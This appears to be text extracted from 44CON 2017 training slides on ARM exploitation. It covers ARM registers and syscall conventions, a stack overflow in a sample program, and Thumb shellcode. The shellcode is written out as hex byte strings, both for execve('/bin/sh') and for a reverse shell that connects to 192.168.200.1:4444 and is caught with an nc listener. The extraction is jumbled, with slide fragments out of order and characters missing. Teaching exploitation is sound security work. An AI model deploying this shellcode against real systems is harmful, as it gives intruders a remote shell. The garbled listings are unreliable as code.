Professional Documents
Culture Documents
CEO Net-square.
Hacker, Speaker, Trainer,
Author.
M.S. Computer Science
Purdue University.
LinkedIn: saumilshah
Twitter: @therealsaumil
Hacker
Oensive Security
Reverse Engineering
Malware Research
ARM Tutorials
Azeria-Labs
Twitter: @Fox0x01
but an ARM in
every pocket.
RISC CPU
Load/Store architecture.
32bit ARM mode / 16bit Thumb mode.
Conditional Execution (ARM mode only).
Inline Barrel Shifter.
Fully aligned memory access.
Bi-Endian (Data).
R0 Accumulator R8
R1 R9
R2 R10
R3 R11 FP Frame Pointer (if used)
R4 R12 IP Intra Procedural Call scratch register
R5 R13 SP Stack Pointer
R6 R14 LR Link Register
R7 Syscall Number R15 PC Program Counter
CPSR Current Program Status Register
31 30 29 28 27 24 9 8 7 6 5 4 0
N Z C V Q J GE E A I F T M
privilege mode
Abort disable
Endianness
IRQ disable
FIQ disable
Greater 10000 = User
underow
oVerow
Negative
Thumb
Jazelle
10011 = SVC
Equal for
10001 = FIQ
SIMD 10010 = IRQ
10111 = Abort
11011 = Undened
mov r0, #5 r0 = 5
addgt r2, r1, #3 if greater than, r2 = r1 + 3
movs r1, r2 r1 = r2, update CPSR
NETSQUARE 44CON 2017 (c) SAUMIL SHAH
ARM Assembler Conventions
#N decimal integer
0xN hexadecimal integer
0bN binary integer
_start:
.code 32
// code goes here Inspecting the assembled code
bkpt
objdump d program.o
32 bits
0x8108 ...
0x810c ...
0x8110 ...
Intel x86
PUSH parameters on the stack
MOV EAX, syscall_number
SYSENTER / INT 80
ARM
r0, r1, ..., r6 parameters loaded in registers
MOV r7, syscall_number
SVC #0
Return value in r0
NETSQUARE 44CON 2017 (c) SAUMIL SHAH
Example: write()
victim1.c
int main(int argc, char *argv[])
{
if(argc > 1)
func1(argv[1]);
}
pc = 0x41414140
sp
bx sp
A A A A A A A A A A ... A A A A A A A A A A pc SHELLCODE...
sp
0xb6ea1531
bx sp
switch to Thumb mode
sp
r0 "/bin/sh"
syscall 11
r1 0 (NULL)
r2 0 (NULL)
r7 11 (syscall number)
svc #0
.code 16
add r0, pc, #8
sub r1, r1, r1
mov r2, r1
strb r2, [r0, #7]
mov r7, #11
svc #1
write a NULL
.ascii "/bin/shX" byte at the end
of "/bin/shX"
r0
shellcode
2. Link as RWX ELF ld -N shellcode.o o shellcode.elf
binary
3. Extract RAW objcopy O binary shellcode.elf
shellcode.bin
assembly
4. Derive a hex hexdump v e '"\\" 1/1 "x%02x"'
shellcode.bin
encoded string -OR-
./hex_encode.pl shellcode.bin
connect
nc l p 4444 socket
1 - STDOUT
2 - STDERR
0 STDIN
execve
"/bin/sh"
listener
execve("/bin/sh", 0, 0);
addr: "\x02\x00\xPP\xPP\xAA\xAA\xAA\xAA"
Protocol Port IP Address (big endian)
"\x02\x00\x11\x5c\xc0\xa8\xc8\x01"
4444 192.168.200.1
dup2(sd, 0)
dup2(sd, 1)
dup2(sd, 2)
execve("/bin/sh", 0, 0)
$shellcode = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x03\xa0\x92\x1a
\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\xc0\x46/bin/shX";
shellcode = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x03\xa0\x92\x1a
\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\xc0\x46/bin/shX"
$shellcode = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21
\x92\x1a\xc8\x27\x51\x37\x01\xdf\x04\x1c\x0b\xa1\x4a\x70\xca\x73
\x10\x22\x02\x37\x01\xdf\x3f\x27\x20\x1c\x49\x1a\x01\xdf\x20\x1c
\x01\x31\x01\xdf\x20\x1c\x01\x31\x01\xdf\x05\xa0\x52\x40\x05\xb4
\x69\x46\x0b\x27\x01\xdf\xc0\x46\x02\xff" . pack("n", 4444) .
chr(192) . chr(168) . chr(200) . chr(1) . "/bin/shX";
shellcode = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21
\x92\x1a\xc8\x27\x51\x37\x01\xdf\x04\x1c\x0b\xa1\x4a\x70\xca\x73
\x10\x22\x02\x37\x01\xdf\x3f\x27\x20\x1c\x49\x1a\x01\xdf\x20\x1c
\x01\x31\x01\xdf\x20\x1c\x01\x31\x01\xdf\x05\xa0\x52\x40\x05\xb4
\x69\x46\x0b\x27\x01\xdf\xc0\x46\x02\xff" + pack(">H", 4444) +
chr(192) + chr(168) + chr(200) + chr(1) + "/bin/shX"
Blog:
http://blog.exploitlab.net